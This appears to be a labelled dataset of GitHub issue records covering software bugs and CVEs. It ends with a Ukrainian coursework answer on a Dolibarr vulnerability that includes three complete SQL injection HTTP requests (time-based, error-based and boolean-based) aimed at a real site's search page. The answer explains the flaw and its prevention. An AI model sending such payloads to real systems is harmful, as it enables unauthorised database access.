> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3Aae90efa8-3cf5-4ff9-9637-c7be28b06541>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3Accebed0b-6bdb-4853-ba2a-6e88321ea4d5>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3Ad54c9d42-99ce-415b-ac7c-a2b3498eb7af> ;
> ...
>
> So it looks like the Resource Map is correct which makes sense because it was generated using the R package.
>
> The package view uses the Solr query resourceMap:{RESOURCE_MAP} to fill in the table. If you run this query you see the 11 objects, not 16. This explains the table view not showing all the files.
>
> If you look at the documents section of the metadata object's Solr doc, you'll see the 16 objects it documents (itself + 15 data objects.
>
> So what's going on here? Am I wrong to think that it's just the index that is showing the wrong information?
>
> I have forced a reindex with no change
> I have not checked the arctica logs for any errors
|
1.0
|
Metadata/data objects which have obsoletedBy field ignore the resource map index - ---
Author Name: **Jing Tao** (Jing Tao)
Original Redmine Issue: 7083, https://projects.ecoinformatics.org/ecoinfo/issues/7083
Original Date: 2016-08-08
Original Assignee: Jing Tao
---
Hi Bryce:
I looked at the index of the 16 objects and found 5 of them don't have the value of resource_map_urn:uuid:2e3c8c4c-e606-4710-b321-8edc4d506b0a at the resourceMap element:
urn%3Auuid%3A0f64673d-d270-411f-a5ed-98351d3d9450
urn%3Auuid%3A12c0ab6a-5eb3-43de-a16c-e71acaeb9817
urn%3Auuid%3A45ee065f-746e-4780-872b-d98cabeb0ad7
urn%3Auuid%3Aae90efa8-3cf5-4ff9-9637-c7be28b06541
urn%3Auuid%3Accebed0b-6bdb-4853-ba2a-6e88321ea4d5
So this is the reason you only get 11 documents when you query this resource map value.
And all of the five objects have the field "obsoletedBy" and the other 11 objects don't have the field.
The reason why I looked at the field "obsoletedBy" is I recently found that there was a bug in the d1_cn_index_processor component - when you index a resource map, the component in the resource map will ignore the resource map if it has the "obsoletedBy" field. So this issue sounds like the reflection of this bug.
I will look at the metacat index code to make sure.
Thanks,
Jing
On 8/8/16 12:13 PM, Bryce Mecum wrote:
>
> So @scng got a hold of me to ask about strange behavior where there package table on two dataset pages are not showing the right number of files. This is a write up of what she told me and what I found so that someone else, @couture or @cjones can see about addressing it. This is a blocker on Bill Simpson's ticket RT12930.
>
> This applies to two packages:
>
> O-Buoy 8 (needs link)
> O-Buoy 15
>
> These two packages were recently updated to make them editable (adding otherEntity elements to the EML) by @scng using the R package.
>
> If you look at O-Buoy 15, you'll see ten data objects in the package. However, the R @scng wrote intended to add 15 data objects to the package. If you look at the resource map, resource_map_urn:uuid:2e3c8c4c-e606-4710-b321-8edc4d506b0a, you'll see it aggregates+documents 16 PIDs (metadata + 15 data):
>
> Here's an invalid and abridged section from the resource map, converted to Turtle format before pasting here:
> ...
> ore:aggregates <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A0f64673d-d270-411f-a5ed-98351d3d9450>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A12c0ab6a-5eb3-43de-a16c-e71acaeb9817>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A1584c53e-3d5c-4b70-9bf6-1033de8e2fd1>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A1c2d1c50-4d79-4fe5-b650-024e63818336>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A2e3c8c4c-e606-4710-b321-8edc4d506b0a>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A30a3a76c-c965-4594-8cfd-c652d46ebbe5>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A40d6e8e4-83eb-4579-8b00-90bf28282769>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A45ee065f-746e-4780-872b-d98cabeb0ad7>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A4eb92d77-19f4-4a3a-8468-4022926ea4e2>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A6d57e765-32a0-4a3e-ba12-5e681f92b7e5>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A73926857-7d7c-4a6e-bce3-1556bd98df01>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A770eb22d-88bb-4c6f-9016-283f4ff7a518>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A8539eac4-21f5-4a3a-8c0a-5ad7249cf38c>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3Aae90efa8-3cf5-4ff9-9637-c7be28b06541>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3Accebed0b-6bdb-4853-ba2a-6e88321ea4d5>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3Ad54c9d42-99ce-415b-ac7c-a2b3498eb7af> ;
> ...
>
> So it looks like the Resource Map is correct which makes sense because it was generated using the R package.
>
> The package view uses the Solr query resourceMap:{RESOURCE_MAP} to fill in the table. If you run this query you see the 11 objects, not 16. This explains the table view not showing all the files.
>
> If you look at the documents section of the metadata object's Solr doc, you'll see the 16 objects it documents (itself + 15 data objects.
>
> So what's going on here? Am I wrong to think that it's just the index that is showing the wrong information?
>
> I have forced a reindex with no change
> I have not checked the arctica logs for any errors
|
non_defect
|
metadata data objects which have obsoletedby field ignore the resource map index author name jing tao jing tao original redmine issue original date original assignee jing tao hi bryce i looked at the index of the objects and found of them don t have the value of resource map urn uuid at the resourcemap element urn urn urn urn urn so this is the reason you only get documents when you query this resource map value and all of the five objects have the field obsoletedby and the other object don t have the field the reason why i looked at the field obsoletedby is i recently found that there was a bug in the cn index processor component when you index a resource map the component in the resource map will ignore the resource map if it has the obsoletedby field so this issue sounds like the reflection of this bug i will look at the metacat index code to make sure thanks jing on pm bryce mecum wrote so scng got a hold of me to ask about strange behavior where there package table on two dataset pages are not showing the right number of files this is a write up of what she told me and what i found so that someone else couture or cjones can see about addressing it this is a blocker on bill simpson s ticket this applies to two packages o buoy needs link o buoy these two packages were recently updated to make them editable adding otherentity elements to the eml by scng using the r package if you look at o buoy you ll see ten data objects in the package however the r scng wrote intended to add data objects to the package if you look at the resource map resource map urn uuid you ll see it aggregates documents pids metadata data here s an invalid and abridged section from the resource map converted to turtle format before pasting here ore aggregates so it looks like the resource map is correct which makes sense because it was generated using the r package the package view uses the solr query resourcemap resource map to fill in the table if you run this query you see the objects not 
this explains the table view not showing all the files if you look at the documents section of the metadata object s solr doc you ll see the objects it documents itself data objects so what s going on here am i wrong to think that it s just the index that is showing the wrong information i have forced a reindex with no change i have not checked the arctica logs for any errors
| 0
|
27,358
| 4,971,652,917
|
IssuesEvent
|
2016-12-05 19:19:14
|
kronometrix/recording
|
https://api.github.com/repos/kronometrix/recording
|
closed
|
webrec timestamp format
|
defect-high
|
We don't need the time stamp to be like this:
```
1479580666.253:www.reittiopas.fi:0.260:0.128:0.018:0.128:0.223:41266:200
1479580666.253:www.mtv.fi:0.296:0.085:0.018:0.085:0.106:298113:200
1479580666.253:www.iltalehti.fi:0.322:0.110:0.007:0.110:0.143:578886:200
1479580666.253:www.yle.fi:0.409:0.188:0.007:0.189:0.278:306142:200
1479580666.252:www.hs.fi:0.614:0.378:0.030:0.378:0.402:466376:200
1479580666.252:www.kela.fi:0.641:0.348:0.135:0.348:0.449:93863:200
1479580666.252:www.vr.fi:0.508:0.044:0.042:0.059:0.030:307780:200
1479580666.252:www.finnair.com:0.530:0.073:0.056:0.094:0.211:34819:200
1479580666.253:www.a-katsastus.fi:0.662:0.025:0.007:0.049:0.367:49171:200
1479580666.253:www.sanoma.com:0.587:0.216:0.018:0.216:0.323:33914:200
1479580666.253:www.iltasanomat.fi:0.660:0.106:0.052:0.106:0.225:587117:200
1479580666.253:www.dna.fi:0.753:0.103:0.038:0.150:0.171:96095:200
```
but rather simple: 1479580666
In other recorders we have something like this:
```
use Time::HiRes qw(time alarm setitimer ITIMER_REAL);
...
my $tp = 0; # time precision
...
# check interval input
if ( $interval =~ /\./ ) {
$tp = 3;
}
...
printf "%.${tp}f:%s:%.2f:% ...
```
|
1.0
|
webrec timestamp format - We don't need the time stamp to be like this:
```
1479580666.253:www.reittiopas.fi:0.260:0.128:0.018:0.128:0.223:41266:200
1479580666.253:www.mtv.fi:0.296:0.085:0.018:0.085:0.106:298113:200
1479580666.253:www.iltalehti.fi:0.322:0.110:0.007:0.110:0.143:578886:200
1479580666.253:www.yle.fi:0.409:0.188:0.007:0.189:0.278:306142:200
1479580666.252:www.hs.fi:0.614:0.378:0.030:0.378:0.402:466376:200
1479580666.252:www.kela.fi:0.641:0.348:0.135:0.348:0.449:93863:200
1479580666.252:www.vr.fi:0.508:0.044:0.042:0.059:0.030:307780:200
1479580666.252:www.finnair.com:0.530:0.073:0.056:0.094:0.211:34819:200
1479580666.253:www.a-katsastus.fi:0.662:0.025:0.007:0.049:0.367:49171:200
1479580666.253:www.sanoma.com:0.587:0.216:0.018:0.216:0.323:33914:200
1479580666.253:www.iltasanomat.fi:0.660:0.106:0.052:0.106:0.225:587117:200
1479580666.253:www.dna.fi:0.753:0.103:0.038:0.150:0.171:96095:200
```
but rather simple: 1479580666
In other recorders we have something like this:
```
use Time::HiRes qw(time alarm setitimer ITIMER_REAL);
...
my $tp = 0; # time precision
...
# check interval input
if ( $interval =~ /\./ ) {
$tp = 3;
}
...
printf "%.${tp}f:%s:%.2f:% ...
```
|
defect
|
webrec timestamp format we dont need the time stamp be like this but rather simple in other recorders we have something like this use time hires qw time alarm setitimer itimer real my tp time precision check interval input if interval tp printf tp f s
| 1
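The Perl fragment quoted in the webrec record picks the timestamp precision from the recording interval: a fractional interval switches on three decimal places, a whole-second interval yields a plain integer timestamp. A sketch of the same rule in Python (function names are mine, not from the webrec source):

```python
def timestamp_precision(interval):
    """Return 3 decimal places for sub-second intervals, else 0,
    mirroring the `if ($interval =~ /\\./) { $tp = 3; }` check."""
    return 3 if "." in str(interval) else 0

def format_timestamp(ts, interval):
    """Format a high-resolution timestamp at the chosen precision,
    like Perl's printf "%.${tp}f"."""
    tp = timestamp_precision(interval)
    return f"{ts:.{tp}f}"
```

With a whole-second interval this produces the simple `1479580666` form the record asks for, and keeps millisecond precision only when the interval itself is fractional.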
|
270,513
| 8,461,289,986
|
IssuesEvent
|
2018-10-22 21:21:04
|
clearlinux/swupd-client
|
https://api.github.com/repos/clearlinux/swupd-client
|
closed
|
swupd: autoupdate broken (25550); can not enable
|
bug high priority
|
My system had autoupdate disabled and had fallen behind quite a bit:
```
$ sudo swupd info
Installed version: 24710
Version URL: https://download.clearlinux.org/update/
Content URL: https://cdn.download.clearlinux.org/update/
```
So I manually update to the latest release:
```
$ sudo swupd update
Update started.
Preparing to update from 24710 to 25550
Downloading packs...
...35%
Extracting zstd pack for version 25470
...100%
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 200 - Failure when receiving data from the peer
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 200 - Failure when receiving data from the peer
Starting download retry #1 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
Starting download retry #1 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - No error
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - No error
Starting download retry #2 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Starting download retry #2 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - No error
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - No error
Starting download retry #3 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Starting download retry #3 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - No error
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - No error
Starting download retry #4 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Starting download retry #4 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - No error
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - No error
Starting download retry #5 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Starting download retry #5 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - Timeout was reached
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - Timeout was reached
Statistics for going from version 24710 to version 25550:
changed bundles : 66
new bundles : 5
deleted bundles : 0
changed files : 297291
new files : 27712
deleted files : 40718
Starting download of remaining update content. This may take a while...
...0%Error for /var/lib/swupd/download/.85f02a25adeec74f39d6ad7375e9833a687bf7ed5c7e6f4486a597e137035faf.tar download: Response 0 - Couldn't connect to server
...100%
Finishing download of update content...
Starting download retry #1 for https://cdn.download.clearlinux.org/update//25440/files/85f02a25adeec74f39d6ad7375e9833a687bf7ed5c7e6f4486a597e137035faf.tar
Staging file content
Applying update
...100%
Update was applied.
Calling post-update helper scripts.
none
rngd.service: needs a restart (a library dependency was updated)
clr_debug_fuse.service: needs a restart (a library dependency was updated)
pacdiscovery.service: needs a restart (the binary was updated)
tallow.service: needs a restart (the binary was updated)
systemd-udevd.service: needs a restart (the binary was updated)
pacrunner.service: needs a restart (the binary was updated)
systemd-journald.service: needs a restart (the binary was updated)
clr_debug_daemon.service: needs a restart (a library dependency was updated)
httpd.service: needs a restart (the binary was updated)
mcelog.service: needs a restart (the binary was updated)
systemd-resolved.service: needs a restart (the binary was updated)
systemd-timesyncd.service: needs a restart (the binary was updated)
Update took 1799.1 seconds
37706 files were not in a pack
Update successful. System updated from version 24710 to version 25550
```
Due to many service updates, I rebooted after the update:
```
* A kernel update is available: you may wish to reboot the system.
* Some system services need a restart.
Run `sudo clr-service-restart -a -n` to view them.
WARNING: No system proxies configured.
See /home/mhorn/.README.txt for setup information.
$ sudo clr-service-restart -a -n
systemd-networkd.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart systemd-networkd.service
docker.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart docker.service
polkit.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart polkit.service
bluetooth.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart bluetooth.service
accounts-daemon.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart accounts-daemon.service
wpa_supplicant.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart wpa_supplicant.service
ModemManager.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart ModemManager.service
fwupd.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart fwupd.service
colord.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart colord.service
gdm.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart gdm.service
upower.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart upower.service
dbus.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart dbus.service
systemd-logind.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart systemd-logind.service
```
After the reboot I attempt to enable autoupdate:
```
$ sudo swupd autoupdate
Disabled
$ sudo swupd autoupdate --enable
Running systemctl to enable updates
Removed /etc/systemd/system/swupd-update.service.
Removed /etc/systemd/system/swupd-update.timer.
Failed to start swupd-update.timer: Unit swupd-update.timer not found.
```
Tried a second time:
```
$ sudo swupd autoupdate --enable
Running systemctl to enable updates
Unit swupd-update.service does not exist, proceeding anyway.
Unit swupd-update.timer does not exist, proceeding anyway.
Failed to start swupd-update.timer: Unit swupd-update.timer not found.
$ sudo swupd autoupdate
Failed to get unit file state for swupd-update.service: No such file or directory
Disabled
```
Attempted a Verify:
```
$ sudo swupd verify
Verifying version 25550
Verifying files
...100%
Inspected 320900 files
Verify successful
```
Verify is clean, tried again:
```
$ sudo swupd autoupdate --enable
Running systemctl to enable updates
Unit swupd-update.service does not exist, proceeding anyway.
Unit swupd-update.timer does not exist, proceeding anyway.
Failed to start swupd-update.timer: Unit swupd-update.timer not found.
$ sudo swupd autoupdate
Failed to get unit file state for swupd-update.service: No such file or directory
Disabled
```
Okay, Verify Fix:
```
$ sudo swupd verify --fix
Verifying version 25550
Verifying files
...100%
Starting download of remaining update content. This may take a while...
...100%
Finishing download of update content...
Adding any missing files
Fixing modified files
...100%
Inspected 320900 files
0 files were missing
0 files found which should be deleted
Calling post-update helper scripts.
none
Fix successful
$ sudo swupd autoupdate --enable
Running systemctl to enable updates
Unit swupd-update.service does not exist, proceeding anyway.
Unit swupd-update.timer does not exist, proceeding anyway.
Failed to start swupd-update.timer: Unit swupd-update.timer not found.
```
Still not able to enable auto-update.
Next steps?
|
1.0
|
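One possible next step is to recreate the missing unit files by hand, since `swupd autoupdate --enable` apparently removed the `/etc/systemd/system` symlinks and systemd can no longer find `swupd-update.service` or `swupd-update.timer`. The sketch below is a hypothetical minimal recreation — the unit names come from the error messages above, but the `ExecStart` path, descriptions, and timer schedule are assumptions, not the stock Clear Linux units:

```
# /etc/systemd/system/swupd-update.service (hypothetical minimal unit)
[Unit]
Description=swupd software update

[Service]
Type=oneshot
ExecStart=/usr/bin/swupd update

# /etc/systemd/system/swupd-update.timer (hypothetical schedule)
[Unit]
Description=Periodic swupd software update

[Timer]
OnCalendar=daily
Persistent=true

[Install]
WantedBy=timers.target
```

After creating both files, `sudo systemctl daemon-reload && sudo systemctl enable --now swupd-update.timer` should let `swupd autoupdate` report Enabled — assuming the missing unit files are the only problem.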
|
non_defect
|
| 0
|
101,929
| 12,730,669,532
|
IssuesEvent
|
2020-06-25 07:53:26
|
BlueBrain/nexus
|
https://api.github.com/repos/BlueBrain/nexus
|
opened
|
Studio Migration
|
project-fusion 🦄 design 🦊 team:frontend
|
Options
- Port entire functionality as a "Studio Widget"
- Each studio becomes project, each workspace becomes an activity, each dashboard becomes its own widget
- Studio becomes an activity, with a workspace and dashboard as nested activities
- Keep it inside the Admin "subapp"
|
1.0
|
|
non_defect
|
| 0
|
77,773
| 3,507,255,764
|
IssuesEvent
|
2016-01-08 12:12:29
|
OregonCore/OregonCore
|
https://api.github.com/repos/OregonCore/OregonCore
|
closed
|
loot sunwell (BB #752)
|
migrated Priority: Medium Type: Bug
|
This issue was migrated from bitbucket.
**Original Reporter:** alex63168
**Original Date:** 03.12.2014 20:04:50 GMT+0000
**Original Priority:** major
**Original Type:** bug
**Original State:** resolved
**Direct Link:** https://bitbucket.org/oregon/oregoncore/issues/752
<hr>
Loot does not work in Sunwell; only 2 cloth items drop.
|
1.0
|
|
non_defect
|
| 0
|
100,792
| 16,490,416,873
|
IssuesEvent
|
2021-05-25 02:19:07
|
hiucimon/PF2Client
|
https://api.github.com/repos/hiucimon/PF2Client
|
opened
|
CVE-2021-23383 (High) detected in handlebars-4.0.11.tgz
|
security vulnerability
|
## CVE-2021-23383 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>handlebars-4.0.11.tgz</b></p></summary>
<p>Handlebars provides the power necessary to let you build semantic templates effectively with no frustration</p>
<p>Library home page: <a href="https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz">https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz</a></p>
<p>Path to dependency file: /PF2Client/package.json</p>
<p>Path to vulnerable library: PF2Client/node_modules/handlebars/package.json</p>
<p>
Dependency Hierarchy:
- build-angular-0.6.8.tgz (Root Library)
- istanbul-0.4.5.tgz
- :x: **handlebars-4.0.11.tgz** (Vulnerable Library)
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
The handlebars package before 4.7.7 is vulnerable to Prototype Pollution when certain compiling options are selected to compile templates coming from an untrusted source.
<p>Publish Date: 2021-05-04
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-23383>CVE-2021-23383</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>9.8</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23383">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23383</a></p>
<p>Release Date: 2021-05-04</p>
<p>Fix Resolution: handlebars - v4.7.7</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
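The core issue above — prototype pollution — can be illustrated outside handlebars with a deliberately naive merge helper. This is a generic sketch, not the actual handlebars code path or payload: a recursive merge copies an attacker-supplied `__proto__` key from untrusted JSON onto `Object.prototype`, so every object suddenly "has" the attacker's property.

```typescript
// Hypothetical naive merge (NOT handlebars code): recursively copies
// every key from source into target, including "__proto__".
function naiveMerge(target: any, source: any): any {
  for (const key of Object.keys(source)) {
    if (source[key] !== null && typeof source[key] === "object") {
      if (typeof target[key] !== "object" || target[key] === null) {
        target[key] = {};
      }
      naiveMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// JSON.parse creates an own, enumerable "__proto__" property, so the
// merge recurses into Object.prototype and writes "polluted" there.
const payload = JSON.parse('{"__proto__": {"polluted": true}}');
naiveMerge({}, payload);

const victim: any = {};
console.log(victim.polluted); // true: Object.prototype was polluted
```

Upgrading to handlebars 4.7.7, as the suggested fix states, closes the analogous path inside the library.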
|
True
|
|
non_defect
|
| 0
|
53,360
| 11,043,596,980
|
IssuesEvent
|
2019-12-09 11:31:41
|
ballerina-platform/ballerina-lang
|
https://api.github.com/repos/ballerina-platform/ballerina-lang
|
opened
|
Tooling not working with field/index/invocation access on grouped varRef
|
Area/Tooling Component/VScodePlugin Priority/High
|
**Description:**
https://github.com/ballerina-platform/ballerina-lang/pull/20234 enabled field/index/invocation access on grouped `varRefs`. However, it's not reflected in tooling (VS code plugin).
**Steps to reproduce:**
```ballerina
public type Person record {
int age;
string name;
};
public function main() {
Person p = {
age: 0,
name: ""
};
// typing `p.` and ctrl + space suggests `age`, `name`.
    // typing `(p).` and ctrl + space should suggest `age`, `name` as well,
// but it's not getting suggested.
}
```
**Affected Versions:**
1.1.0-alpha
**OS, DB, other environment details and versions:**
Mac / VS code plugin.
**Related Issues (optional):**
-
|
1.0
|
|
non_defect
|
| 0
|
372,753
| 26,018,106,908
|
IssuesEvent
|
2022-12-21 10:13:24
|
oleksandrblazhko/ai181-zalukovskij
|
https://api.github.com/repos/oleksandrblazhko/ai181-zalukovskij
|
closed
|
CW7
|
documentation
|
# Question 1
### Question
Describe the software in which the vulnerability was found:
- the name of the software and a URL link to it on the internet (found via a search engine);
- the purpose of the software and examples of consumers who might be interested in using it;
### Answer
- Dolibarr, https://www.dolibarr.org/;
- Dolibarr ERP & CRM is a modern software package that helps manage your organization's activity (contacts, suppliers, invoices, orders, stock, agenda…). It is an open-source software package intended for small, medium-sized, and large companies, foundations, and freelancers.
# Question 2
### Question
Describe the discovered vulnerability by translating its Description section into Ukrainian.
### Answer
SQL injection attacks can lead to unauthorized access to sensitive data such as passwords, credit card details, or personal user information. Many high-profile data breaches of recent years have been the result of SQL injection attacks, leading to reputational damage and regulatory fines. In some cases an attacker can obtain a persistent backdoor into an organization's systems, resulting in a long-term compromise that may go unnoticed for an extended period. Only versions 16.0.1 and 16.0.2 are affected; 16.0.0 and below and 16.0.3 and above are not affected.
# Question 3
### Question
Provide example fragments of vulnerable program code, having reviewed the References to Advisories, Solutions, and Tools section.
### Answer
Time-based blind SQL injection
GET /search.php?s=%27)%20AND%20(SELECT%209569%20FROM%20(SELECT(SLEEP(10)))jsCH)--%20gYso HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Error-based SQL injection
GET /search.php?s=')+AND+EXTRACTVALUE(5960,CONCAT(0x5c,0x7171626271,(SELECT+(ELT(5960%3d5960,1))),0x7171766b71))--+Vmlg HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Boolean-based blind SQL injection
GET /search.php?s=3893')+OR+9606%3d9606--+aLaa HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
# Question 4 (3 points)
### Question
Table 2 lists URL links to scientific publications related to SQL injection.
Having reviewed the publication whose number matches your lab assignment variant number, translate the indicated section titles into Ukrainian.
### Answer
#### 8 Prevention Tips
To avoid the attacks described in this paper, preventing SQLi flaws should have the highest priority. The use of prepared statements is considered the safest preventive measure [18]. Prepared statements guarantee that attackers cannot change the intent of a query even if other SQL commands are inserted [19].
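To make the prepared-statement recommendation above concrete, here is a small self-contained sketch (no real database driver; the table and column names are made up) contrasting string concatenation with a placeholder-style query, using the time-based payload from Question 3:

```typescript
// Vulnerable: the user-supplied string is spliced directly into the SQL.
function buildUnsafe(search: string): string {
  return `SELECT * FROM posts WHERE title LIKE ('%${search}%')`;
}

// Prepared-statement style: the SQL text is fixed; the driver sends the
// payload separately as a parameter, so it can never become SQL syntax.
function buildSafe(search: string): { sql: string; params: string[] } {
  return { sql: "SELECT * FROM posts WHERE title LIKE ?", params: [`%${search}%`] };
}

// The decoded time-based payload from the /search.php request above.
const payload = "') AND (SELECT 9569 FROM (SELECT(SLEEP(10)))jsCH)-- gYso";

console.log(buildUnsafe(payload).includes("SLEEP(10)")); // true: payload became SQL
console.log(buildSafe(payload).sql.includes("SLEEP"));   // false: payload stays data
```

The `?` placeholder syntax is driver-dependent (some use `$1` or named parameters), but the principle is the same: query structure and data travel separately.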
Various sanitization mechanisms, such as magic_quotes() and addslashes(), cannot fully prevent the presence or exploitation of an SQLi vulnerability, since certain techniques used in combination with environmental conditions may still allow attackers to exploit it [20][21]. If prepared statements are not used, input validation that rejects bad input is recommended instead of escaping or rewriting it [22].
An administrator should always be prepared for unauthorized access to the underlying database. A good countermeasure is to restrict database access to the least privileges: any granted privilege should be given to the smallest amount of code necessary, for the shortest period of time required to do the job [23]. Following this principle, users should only have access to the information and resources that are strictly necessary.
As a final step, to successfully mitigate possible DNS exfiltration attacks, the administrator should ensure that the execution of all unnecessary system routines is restricted. Even if everything else fails, attackers should not be able to run the ones that can trigger DNS requests.
Some work has been done in the area of detecting malicious activity in DNS traffic [25][26], but, mostly due to the lack of practical mainstream solutions, it will not be covered specifically here.
#### 9 Conclusion
This paper showed how attackers can use the DNS exfiltration technique to significantly speed up data retrieval when only relatively slow SQLi methods are usable. In addition, the number of requests to the vulnerable web server is drastically reduced, making the attack less noisy.
Since it requires control over a domain name server, it will probably not be used by most attackers. The implementation, however, was straightforward, so its practical value cannot be ignored. The implemented support inside sqlmap should make it publicly available to everyone for further research.
|
1.0
|
CW7 - # Запитання №1
### Запитання
Опишіть ПЗ, в якому знайдено вразливість:
- назва ПЗ, URL-посилання в інтернеті (знайти через пошукову систему);
- призначення ПЗ та приклади споживачів, які можуть бути зацікавлені у використанні ПЗ;
### Відповідь
- Dolibarr, https://www.dolibarr.org/;
